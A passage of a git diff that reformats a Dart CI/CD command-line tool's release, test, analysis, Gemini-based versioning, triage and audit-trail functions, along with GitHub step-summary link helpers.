(Directory('$repoRoot/$kCicdAuditDir').existsSync()) filesToAdd.add('$kCicdAuditDir/'); _info('Staging ${filesToAdd.length} release artifacts for commit'); for (final path in filesToAdd) { final fullPath = '$repoRoot/$path'; @@ -2247,11 +2043,7 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - final diffResult = Process.runSync('git', [ - 'diff', - '--cached', - '--quiet', - ], workingDirectory: repoRoot); + final diffResult = Process.runSync('git', ['diff', '--cached', '--quiet'], workingDirectory: repoRoot); if (diffResult.exitCode != 0) { // Build a rich, detailed commit message from available artifacts final commitMsg = _buildReleaseCommitMessage( @@ -2263,20 +2055,12 @@ Future _runCreateRelease(String repoRoot, List args) async { // Use a temp file for the commit message to avoid shell escaping issues final commitMsgFile = File('$repoRoot/.git/RELEASE_COMMIT_MSG'); commitMsgFile.writeAsStringSync(commitMsg); - _exec( - 'git', - ['commit', '-F', commitMsgFile.path], - cwd: repoRoot, - fatal: true, - ); + _exec('git', ['commit', '-F', commitMsgFile.path], cwd: repoRoot, fatal: true); commitMsgFile.deleteSync(); // Use GH_TOKEN for push authentication (HTTPS remote) - final ghToken = - Platform.environment['GH_TOKEN'] ?? - Platform.environment['GITHUB_TOKEN']; - final remoteRepo = - Platform.environment['GITHUB_REPOSITORY'] ?? effectiveRepo; + final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + final remoteRepo = Platform.environment['GITHUB_REPOSITORY'] ?? 
effectiveRepo; if (ghToken != null && remoteRepo.isNotEmpty) { _exec('git', [ 'remote', @@ -2292,20 +2076,12 @@ Future _runCreateRelease(String repoRoot, List args) async { } // Step 5: Create git tag (verify it doesn't already exist) - final tagCheck = Process.runSync('git', [ - 'rev-parse', - tag, - ], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', ['rev-parse', tag], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _error('Tag $tag already exists. Cannot create release.'); exit(1); } - _exec( - 'git', - ['tag', '-a', tag, '-m', 'Release v$newVersion'], - cwd: repoRoot, - fatal: true, - ); + _exec('git', ['tag', '-a', tag, '-m', 'Release v$newVersion'], cwd: repoRoot, fatal: true); _exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true); _success('Created tag: $tag'); @@ -2322,23 +2098,14 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelogLink = File('$repoRoot/CHANGELOG.md').existsSync() ? ' | [CHANGELOG.md](https://github.com/$effectiveRepo/blob/v$newVersion/CHANGELOG.md)' : ''; - final migrationLink = - File('${releaseDir.path}/migration_guide.md').existsSync() + final migrationLink = File('${releaseDir.path}/migration_guide.md').existsSync() ? 
' | [Migration Guide]($kReleaseNotesDir/v$newVersion/migration_guide.md)' : ''; releaseBody += '\n\n---\n[Full Changelog](https://github.com/$effectiveRepo/compare/$prevTag...v$newVersion)' '$changelogLink$migrationLink'; - final ghArgs = [ - 'release', - 'create', - tag, - '--title', - 'v$newVersion', - '--notes', - releaseBody, - ]; + final ghArgs = ['release', 'create', tag, '--title', 'v$newVersion', '--notes', releaseBody]; if (effectiveRepo.isNotEmpty) ghArgs.addAll(['--repo', effectiveRepo]); _exec('gh', ghArgs, cwd: repoRoot); @@ -2392,15 +2159,12 @@ Future _runTest(String repoRoot) async { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { _success('No test/ directory found — skipping tests'); - _writeStepSummary( - '## Test Results\n\n**No test/ directory found — skipped.**\n', - ); + _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); return; } // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = - Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); final jsonPath = '$logDir/results.json'; @@ -2425,11 +2189,7 @@ Future _runTest(String repoRoot) async { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. 
- final process = await Process.start( - Platform.resolvedExecutable, - testArgs, - workingDirectory: repoRoot, - ); + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -2450,18 +2210,13 @@ Future _runTest(String repoRoot) async { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - _error( - 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', - ); + _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([ - stdoutDone, - stderrDone, - ]).timeout(const Duration(seconds: 30)); + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } @@ -2492,26 +2247,15 @@ Future _runTest(String repoRoot) async { /// protobuf code, which are expected and must not block CI. 
Future _runAnalyze(String repoRoot) async { _header('Running Analysis'); - final result = await Process.run('dart', [ - 'analyze', - ], workingDirectory: repoRoot); + final result = await Process.run('dart', ['analyze'], workingDirectory: repoRoot); final output = (result.stdout as String); stdout.write(output); stderr.write(result.stderr); // Count severity levels in output - final errorCount = RegExp( - r'^\s*error\s+-\s+', - multiLine: true, - ).allMatches(output).length; - final warningCount = RegExp( - r'^\s*warning\s+-\s+', - multiLine: true, - ).allMatches(output).length; - final infoCount = RegExp( - r'^\s*info\s+-\s+', - multiLine: true, - ).allMatches(output).length; + final errorCount = RegExp(r'^\s*error\s+-\s+', multiLine: true).allMatches(output).length; + final warningCount = RegExp(r'^\s*warning\s+-\s+', multiLine: true).allMatches(output).length; + final infoCount = RegExp(r'^\s*info\s+-\s+', multiLine: true).allMatches(output).length; _info(' Errors: $errorCount, Warnings: $warningCount, Infos: $infoCount'); @@ -2572,11 +2316,7 @@ Future _runVerifyProtos(String repoRoot) async { final protoDir = Directory('$repoRoot/proto/src'); var protoCount = 0; if (protoDir.existsSync()) { - protoCount = protoDir - .listSync(recursive: true) - .whereType() - .where((f) => f.path.endsWith('.proto')) - .length; + protoCount = protoDir.listSync(recursive: true).whereType().where((f) => f.path.endsWith('.proto')).length; } _info('Proto source files in proto/src/: $protoCount'); @@ -2589,12 +2329,7 @@ Future _runVerifyProtos(String repoRoot) async { final libDir = Directory('$repoRoot/lib'); var generatedCount = 0; if (libDir.existsSync()) { - final extensions = [ - '.pb.dart', - '.pbenum.dart', - '.pbjson.dart', - '.pbgrpc.dart', - ]; + final extensions = ['.pb.dart', '.pbenum.dart', '.pbjson.dart', '.pbgrpc.dart']; generatedCount = libDir .listSync(recursive: true) .whereType() @@ -2608,9 +2343,7 @@ Future _runVerifyProtos(String repoRoot) async { exit(1); } - 
_success( - 'Proto verification passed: $protoCount sources, $generatedCount generated', - ); + _success('Proto verification passed: $protoCount sources, $generatedCount generated'); } /// Run documentation update via Gemini. @@ -2633,10 +2366,7 @@ Future _runDocumentation(String repoRoot) async { _error('Prompt script not found: $docScript'); exit(1); } - final prompt = _runSync( - 'dart run $docScript "$prevTag" "$newVersion"', - repoRoot, - ); + final prompt = _runSync('dart run $docScript "$prevTag" "$newVersion"', repoRoot); if (prompt.isEmpty) { _error('Documentation prompt generator produced empty output.'); exit(1); @@ -2644,9 +2374,7 @@ Future _runDocumentation(String repoRoot) async { ctx.savePrompt('documentation', prompt); if (_dryRun) { - _info( - '[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)', - ); + _info('[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)'); return; } @@ -2656,9 +2384,7 @@ Future _runDocumentation(String repoRoot) async { final includes = []; if (File('/tmp/commit_analysis.json').existsSync()) { includes.add('@/tmp/commit_analysis.json'); - } else if (File( - '$repoRoot/$kCicdRunsDir/explore/commit_analysis.json', - ).existsSync()) { + } else if (File('$repoRoot/$kCicdRunsDir/explore/commit_analysis.json').existsSync()) { includes.add('@$repoRoot/$kCicdRunsDir/explore/commit_analysis.json'); } includes.add('@README.md'); @@ -2704,33 +2430,17 @@ Future _runPreReleaseTriage(String repoRoot, List args) async { if (!_geminiAvailable(warnOnly: true)) { _warn('Producing empty issue manifest (Gemini unavailable).'); final ctx = RunContext.create(repoRoot, 'pre-release-triage'); - final emptyManifest = - '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; - ctx.saveArtifact( - 'pre-release-triage', - 'issue_manifest.json', - emptyManifest, - ); - _success( - 'Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json', - ); + 
final emptyManifest = '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; + ctx.saveArtifact('pre-release-triage', 'issue_manifest.json', emptyManifest); + _success('Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json'); ctx.finalize(exitCode: 0); return; } - final triageArgs = [ - '--pre-release', - '--prev-tag', - prevTag, - '--version', - newVersion, - '--force', - ]; + final triageArgs = ['--pre-release', '--prev-tag', prevTag, '--version', newVersion, '--force']; if (_verbose) triageArgs.add('--verbose'); - _info( - 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', - ); + _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); final result = await Process.run( 'dart', @@ -2780,9 +2490,7 @@ Future _runPostReleaseTriage(String repoRoot, List args) async { ]; if (_verbose) triageArgs.add('--verbose'); - _info( - 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', - ); + _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); final result = await Process.run( 'dart', @@ -2827,9 +2535,7 @@ Future _runArchiveRun(String repoRoot, List args) async { runDirPath = RunContext.findLatestRun(repoRoot); if (runDirPath == null) { _warn('No $kCicdRunsDir/ directory found — nothing to archive.'); - _info( - 'This is expected if audit trail artifacts were not transferred between jobs.', - ); + _info('This is expected if audit trail artifacts were not transferred between jobs.'); return; } _info('Using latest run: $runDirPath'); @@ -2866,9 +2572,7 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (args[i] == '--output-dir') outputDir = args[i + 1]; } - final incomingPath = incomingDir.startsWith('/') - ? incomingDir - : '$repoRoot/$incomingDir'; + final incomingPath = incomingDir.startsWith('/') ? 
incomingDir : '$repoRoot/$incomingDir'; final incoming = Directory(incomingPath); if (!incoming.existsSync()) { _warn('No incoming audit trails found at $incomingDir'); @@ -2884,14 +2588,8 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { // Create the merged run directory with a unique timestamp final now = DateTime.now(); - final timestamp = now - .toIso8601String() - .replaceAll(':', '-') - .replaceAll('.', '-') - .substring(0, 19); - final outputPath = outputDir.startsWith('/') - ? outputDir - : '$repoRoot/$outputDir'; + final timestamp = now.toIso8601String().replaceAll(':', '-').replaceAll('.', '-').substring(0, 19); + final outputPath = outputDir.startsWith('/') ? outputDir : '$repoRoot/$outputDir'; final mergedRunDir = '$outputPath/run_${timestamp}_merged'; Directory(mergedRunDir).createSync(recursive: true); @@ -2923,15 +2621,10 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (fileName == 'meta.json') { // Collect source meta for the merged meta.json try { - final meta = - json.decode(child.readAsStringSync()) - as Map; + final meta = json.decode(child.readAsStringSync()) as Map; sources.add({'artifact': artifactName, ...meta}); } catch (_) { - sources.add({ - 'artifact': artifactName, - 'error': 'failed to parse meta.json', - }); + sources.add({'artifact': artifactName, 'error': 'failed to parse meta.json'}); } } } @@ -2957,13 +2650,9 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { 'platform': Platform.operatingSystem, 'dart_version': Platform.version.split(' ').first, }; - File('$mergedRunDir/meta.json').writeAsStringSync( - '${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n', - ); + File('$mergedRunDir/meta.json').writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(mergedMeta)}\n'); - _success( - 'Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles files)', - ); + _success('Merged ${artifactDirs.length} audit trail(s) into $mergedRunDir ($totalFiles 
files)'); } /// Recursively copy a directory tree. @@ -3093,9 +2782,7 @@ Future _installTree() async { } else if (Platform.isLinux) { _exec('sudo', ['apt', 'install', '-y', 'tree']); } else if (Platform.isWindows) { - _info( - 'tree is built-in on Windows (limited). For full tree: choco install tree', - ); + _info('tree is built-in on Windows (limited). For full tree: choco install tree'); } } @@ -3104,10 +2791,7 @@ Future _installTree() async { // ═══════════════════════════════════════════════════════════════════════════════ String _detectPrevTag(String repoRoot) { - final result = _runSync( - "git tag -l 'v*' --sort=-version:refname | head -1", - repoRoot, - ); + final result = _runSync("git tag -l 'v*' --sort=-version:refname | head -1", repoRoot); if (result.isEmpty) { // No tags yet -- use the first commit (head -1 to handle multiple roots in monorepos) return _runSync('git rev-list --max-parents=0 HEAD | head -1', repoRoot); @@ -3116,10 +2800,7 @@ String _detectPrevTag(String repoRoot) { } String _detectNextVersion(String repoRoot, String prevTag) { - final currentVersion = _runSync( - "awk '/^version:/{print \$2}' pubspec.yaml", - repoRoot, - ); + final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); // Derive bump base from prevTag (not pubspec.yaml) to avoid stale-version collisions. final tagVersion = prevTag.startsWith('v') ? prevTag.substring(1) : prevTag; @@ -3138,20 +2819,11 @@ String _detectNextVersion(String repoRoot, String prevTag) { var patch = int.tryParse(parts[2]) ?? 
0; // ── Pass 1: Fast regex heuristic (fallback if Gemini unavailable) ── - final commits = _runSync( - 'git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', - repoRoot, - ); - final commitSubjects = _runSync( - 'git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', - repoRoot, - ); + final commits = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s%n%b" 2>/dev/null', repoRoot); + final commitSubjects = _runSync('git log "$prevTag"..HEAD --pretty=format:"%s" --no-merges 2>/dev/null', repoRoot); var bump = 'patch'; - if (RegExp( - r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', - multiLine: true, - ).hasMatch(commits)) { + if (RegExp(r'(BREAKING CHANGE|^[a-z]+(\(.+\))?!:)', multiLine: true).hasMatch(commits)) { bump = 'major'; } else if (RegExp(r'^feat(\(.+\))?:', multiLine: true).hasMatch(commits)) { bump = 'minor'; @@ -3159,11 +2831,7 @@ String _detectNextVersion(String repoRoot, String prevTag) { commitSubjects .split('\n') .every( - (line) => - line.trim().isEmpty || - RegExp( - r'^(chore|style|ci|docs|build)(\(.+\))?:', - ).hasMatch(line.trim()), + (line) => line.trim().isEmpty || RegExp(r'^(chore|style|ci|docs|build)(\(.+\))?:').hasMatch(line.trim()), )) { // Only pure infra/docs/style/build commits with no code changes → no release. // fix:, test:, perf:, and refactor: all default to at least patch. 
@@ -3173,30 +2841,15 @@ String _detectNextVersion(String repoRoot, String prevTag) { _info(' Regex heuristic: $bump'); // ── Pass 2: Gemini analysis (authoritative, overrides regex if available) ── - if (_commandExists('gemini') && - Platform.environment['GEMINI_API_KEY'] != null) { - final commitCount = _runSync( - 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', - repoRoot, - ); - final changedFiles = _runSync( - 'git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', - repoRoot, - ); - final diffStat = _runSync( - 'git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', - repoRoot, - ); - final existingTags = _runSync( - "git tag -l 'v*' --sort=-version:refname | head -10", - repoRoot, - ); + if (_commandExists('gemini') && Platform.environment['GEMINI_API_KEY'] != null) { + final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); + final changedFiles = _runSync('git diff --name-only "$prevTag"..HEAD 2>/dev/null | head -30', repoRoot); + final diffStat = _runSync('git diff --stat "$prevTag"..HEAD 2>/dev/null | tail -5', repoRoot); + final existingTags = _runSync("git tag -l 'v*' --sort=-version:refname | head -10", repoRoot); final commitSummary = commits.split('\n').take(50).join('\n'); // Create a version analysis output directory within the CWD (sandbox-safe) - final versionAnalysisDir = Directory( - '$repoRoot/$kCicdRunsDir/version_analysis', - ); + final versionAnalysisDir = Directory('$repoRoot/$kCicdRunsDir/version_analysis'); versionAnalysisDir.createSync(recursive: true); final bumpJsonPath = '${versionAnalysisDir.path}/version_bump.json'; final prompt = @@ -3249,27 +2902,15 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Save Gemini response for audit trail (strip MCP/warning prefix) if (geminiResult.isNotEmpty) { final jsonStart = geminiResult.indexOf('{'); - final cleaned = jsonStart > 0 - ? 
geminiResult.substring(jsonStart) - : geminiResult; - File( - '${versionAnalysisDir.path}/gemini_response.json', - ).writeAsStringSync(cleaned); + final cleaned = jsonStart > 0 ? geminiResult.substring(jsonStart) : geminiResult; + File('${versionAnalysisDir.path}/gemini_response.json').writeAsStringSync(cleaned); } if (geminiResult.isNotEmpty && File(bumpJsonPath).existsSync()) { try { - final bumpData = - json.decode(File(bumpJsonPath).readAsStringSync()) - as Map; - final rawBump = (bumpData['bump'] as String?) - ?.trim() - .toLowerCase() - .replaceAll(RegExp(r'[^a-z]'), ''); - if (rawBump == 'major' || - rawBump == 'minor' || - rawBump == 'patch' || - rawBump == 'none') { + final bumpData = json.decode(File(bumpJsonPath).readAsStringSync()) as Map; + final rawBump = (bumpData['bump'] as String?)?.trim().toLowerCase().replaceAll(RegExp(r'[^a-z]'), ''); + if (rawBump == 'major' || rawBump == 'minor' || rawBump == 'patch' || rawBump == 'none') { _info(' Gemini analysis: $rawBump (overriding regex: $bump)'); bump = rawBump!; } else { @@ -3308,9 +2949,7 @@ String _detectNextVersion(String repoRoot, String prevTag) { // Guard: ensure version never goes backward from what pubspec.yaml already has if (_compareVersions(nextVersion, currentVersion) < 0) { - _warn( - 'Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.', - ); + _warn('Version regression detected: $nextVersion < $currentVersion. Using $currentVersion.'); return currentVersion; } @@ -3392,19 +3031,13 @@ String _buildReleaseCommitMessage({ buf.writeln('## Changelog'); buf.writeln(); // Trim to first 2000 chars to keep commit message reasonable - buf.writeln( - entry.length > 2000 ? '${entry.substring(0, 2000)}...' : entry, - ); + buf.writeln(entry.length > 2000 ? '${entry.substring(0, 2000)}...' 
: entry); buf.writeln(); } } // Staged file summary - final stagedResult = Process.runSync('git', [ - 'diff', - '--cached', - '--stat', - ], workingDirectory: repoRoot); + final stagedResult = Process.runSync('git', ['diff', '--cached', '--stat'], workingDirectory: repoRoot); final stagedStat = (stagedResult.stdout as String).trim(); if (stagedStat.isNotEmpty) { buf.writeln('## Files Modified'); @@ -3422,11 +3055,7 @@ String _buildReleaseCommitMessage({ if (rationale.isNotEmpty) { buf.writeln('## Version Bump Rationale'); buf.writeln(); - buf.writeln( - rationale.length > 1000 - ? '${rationale.substring(0, 1000)}...' - : rationale, - ); + buf.writeln(rationale.length > 1000 ? '${rationale.substring(0, 1000)}...' : rationale); buf.writeln(); } } @@ -3454,14 +3083,9 @@ String _buildReleaseCommitMessage({ } // Commit range - final commitCount = _runSync( - 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', - repoRoot, - ); + final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); buf.writeln('---'); - buf.writeln( - 'Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)', - ); + buf.writeln('Automated release by CI/CD pipeline (Gemini CLI + GitHub Actions)'); buf.writeln('Commits since $prevTag: $commitCount'); buf.writeln('Generated: ${DateTime.now().toUtc().toIso8601String()}'); @@ -3480,10 +3104,7 @@ bool _commandExists(String command) { String _runSync(String command, String workingDirectory) { if (_verbose) _info('[CMD] $command'); - final result = Process.runSync('sh', [ - '-c', - command, - ], workingDirectory: workingDirectory); + final result = Process.runSync('sh', ['-c', command], workingDirectory: workingDirectory); final output = (result.stdout as String).trim(); if (_verbose && output.isNotEmpty) _info(' $output'); return output; @@ -3526,11 +3147,8 @@ String _releaseLink(String tag) { /// ``` /// Idempotent: replaces any existing reference-link block. 
void _addChangelogReferenceLinks(String repoRoot, String content) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; // Extract all version headers: ## [X.Y.Z] (skip any [Unreleased] entries) final versionPattern = RegExp(r'^## \[([^\]]+)\]', multiLine: true); @@ -3538,10 +3156,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (matches.isEmpty) return; - final versions = matches - .map((m) => m.group(1)!) - .where((v) => v != 'Unreleased') - .toList(); + final versions = matches.map((m) => m.group(1)!).where((v) => v != 'Unreleased').toList(); if (versions.isEmpty) return; @@ -3552,9 +3167,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (i + 1 < versions.length) { // Compare from previous version final prevVersion = versions[i + 1]; - links.writeln( - '[$version]: $server/$repo/compare/v$prevVersion...v$version', - ); + links.writeln('[$version]: $server/$repo/compare/v$prevVersion...v$version'); } else { // Oldest version: link to the tag itself links.writeln('[$version]: $server/$repo/releases/tag/v$version'); @@ -3565,9 +3178,7 @@ void _addChangelogReferenceLinks(String repoRoot, String content) { if (linksStr.isEmpty) return; // Strip any existing reference-link block (lines matching [X.Y.Z]: http...) - final existingLinksPattern = RegExp( - r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$', - ); + final existingLinksPattern = RegExp(r'\n*(\[[\w.\-]+\]: https?://[^\n]+\n?)+$'); var cleaned = content.replaceAll(existingLinksPattern, ''); cleaned = cleaned.trimRight(); @@ -3589,12 +3200,7 @@ String _readFileOr(String path, [String fallback = '(not available)']) { } /// Execute a command. 
Set [fatal] to true to exit on failure (default: false). -void _exec( - String executable, - List args, { - String? cwd, - bool fatal = false, -}) { +void _exec(String executable, List args, {String? cwd, bool fatal = false}) { if (_verbose) _info(' \$ $executable ${args.join(" ")}'); final result = Process.runSync(executable, args, workingDirectory: cwd); if (result.exitCode != 0) { @@ -3605,9 +3211,7 @@ void _exec( void _requireGeminiCli() { if (!_commandExists('gemini')) { - _error( - 'Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup', - ); + _error('Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup'); exit(1); } } @@ -3616,9 +3220,7 @@ void _requireApiKey() { final key = Platform.environment['GEMINI_API_KEY']; if (key == null || key.isEmpty) { _error('GEMINI_API_KEY is not set.'); - _error( - 'Set it via: export GEMINI_API_KEY=', - ); + _error('Set it via: export GEMINI_API_KEY='); exit(1); } } @@ -3631,9 +3233,7 @@ bool _geminiAvailable({bool warnOnly = false}) { _warn('Gemini CLI not installed — skipping Gemini-powered step.'); return false; } - _error( - 'Gemini CLI is not installed. Run: dart run runtime_ci_tooling:manage_cicd setup', - ); + _error('Gemini CLI is not installed. 
Run: dart run runtime_ci_tooling:manage_cicd setup'); exit(1); } final key = Platform.environment['GEMINI_API_KEY']; @@ -3737,15 +3337,9 @@ Future _runInit(String repoRoot) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); if (pubspecFile.existsSync()) { final content = pubspecFile.readAsStringSync(); - final nameMatch = RegExp( - r'^name:\s*(\S+)', - multiLine: true, - ).firstMatch(content); + final nameMatch = RegExp(r'^name:\s*(\S+)', multiLine: true).firstMatch(content); if (nameMatch != null) packageName = nameMatch.group(1)!; - final versionMatch = RegExp( - r'^version:\s*(\S+)', - multiLine: true, - ).firstMatch(content); + final versionMatch = RegExp(r'^version:\s*(\S+)', multiLine: true).firstMatch(content); if (versionMatch != null) packageVersion = versionMatch.group(1)!; _success('Detected package: $packageName v$packageVersion'); } else { @@ -3774,11 +3368,7 @@ Future _runInit(String repoRoot) async { if (repoOwner == 'unknown') { // Fallback: try parsing git remote try { - final gitResult = Process.runSync('git', [ - 'remote', - 'get-url', - 'origin', - ], workingDirectory: repoRoot); + final gitResult = Process.runSync('git', ['remote', 'get-url', 'origin'], workingDirectory: repoRoot); if (gitResult.exitCode == 0) { final url = (gitResult.stdout as String).trim(); // git@github.com:owner/repo.git or https://github.com/owner/repo.git @@ -3834,12 +3424,7 @@ Future _runInit(String repoRoot) async { 'release_notes_path': '$kReleaseNotesDir', }, 'gcp': {'project': ''}, - 'sentry': { - 'organization': '', - 'projects': [], - 'scan_on_pre_release': false, - 'recent_errors_hours': 168, - }, + 'sentry': {'organization': '', 'projects': [], 'scan_on_pre_release': false, 'recent_errors_hours': 168}, 'release': { 'pre_release_scan_sentry': false, 'pre_release_scan_github': true, @@ -3858,25 +3443,13 @@ Future _runInit(String repoRoot) async { }, }, 'labels': { - 'type': [ - 'bug', - 'feature-request', - 'enhancement', - 'documentation', - 'question', 
- ], + 'type': ['bug', 'feature-request', 'enhancement', 'documentation', 'question'], 'priority': ['P0-critical', 'P1-high', 'P2-medium', 'P3-low'], 'area': areaLabels, }, 'thresholds': {'auto_close': 0.9, 'suggest_close': 0.7, 'comment': 0.5}, 'agents': { - 'enabled': [ - 'code_analysis', - 'pr_correlation', - 'duplicate', - 'sentiment', - 'changelog', - ], + 'enabled': ['code_analysis', 'pr_correlation', 'duplicate', 'sentiment', 'changelog'], 'conditional': { 'changelog': {'require_file': 'CHANGELOG.md'}, }, @@ -3896,9 +3469,7 @@ Future _runInit(String repoRoot) async { }, }; - configFile.writeAsStringSync( - '${const JsonEncoder.withIndent(' ').convert(configData)}\n', - ); + configFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(configData)}\n'); _success('Created $kConfigFileName'); } else { _info('$kConfigFileName already exists (kept as-is)'); @@ -3923,16 +3494,12 @@ Future _runInit(String repoRoot) async { if (gitignoreFile.existsSync()) { final content = gitignoreFile.readAsStringSync(); if (!content.contains('.runtime_ci/runs/')) { - gitignoreFile.writeAsStringSync( - '$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', - ); + gitignoreFile.writeAsStringSync('$content\n# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); _success('Added .runtime_ci/runs/ to .gitignore'); repaired++; } } else { - gitignoreFile.writeAsStringSync( - '# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n', - ); + gitignoreFile.writeAsStringSync('# Runtime CI audit trails (local only)\n.runtime_ci/runs/\n'); _success('Created .gitignore with .runtime_ci/runs/'); repaired++; } @@ -3955,9 +3522,7 @@ Future _runInit(String repoRoot) async { print(''); if (!configExists) { _info('Next steps:'); - _info( - ' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.', - ); + _info(' 1. Review .runtime_ci/config.json and customize area labels, cross-repo, etc.'); _info(' 2. 
Add runtime_ci_tooling as a dev_dependency in pubspec.yaml'); _info(' 3. Run: dart run runtime_ci_tooling:manage_cicd setup'); _info(' 4. Run: dart run runtime_ci_tooling:manage_cicd status'); diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 763ae86..8af587f 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -44,8 +44,7 @@ abstract final class StepSummary { /// Build a link to the current workflow run's artifacts page. static String artifactLink([String label = 'View all artifacts']) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; final repo = Platform.environment['GITHUB_REPOSITORY']; final runId = Platform.environment['GITHUB_RUN_ID']; if (repo == null || runId == null) return ''; @@ -54,33 +53,24 @@ abstract final class StepSummary { /// Build a GitHub compare link between two refs. static String compareLink(String prevTag, String newTag, [String? label]) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; final text = label ?? '$prevTag...$newTag'; return '[$text]($server/$repo/compare/$prevTag...$newTag)'; } /// Build a link to a file/path in the repository. static String ghLink(String label, String path) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 
'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; final sha = Platform.environment['GITHUB_SHA'] ?? 'main'; return '[$label]($server/$repo/blob/$sha/$path)'; } /// Build a link to a GitHub Release by tag. static String releaseLink(String tag) { - final server = - Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; - final repo = - Platform.environment['GITHUB_REPOSITORY'] ?? - '${config.repoOwner}/${config.repoName}'; + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY'] ?? '${config.repoOwner}/${config.repoName}'; return '[v$tag]($server/$repo/releases/tag/$tag)'; } @@ -93,11 +83,7 @@ abstract final class StepSummary { /// Escape HTML special characters for safe embedding in GitHub markdown. static String escapeHtml(String input) { - return input - .replaceAll('&', '&') - .replaceAll('<', '<') - .replaceAll('>', '>') - .replaceAll('"', '"'); + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); } /// Parse the NDJSON file produced by `dart test --file-reporter 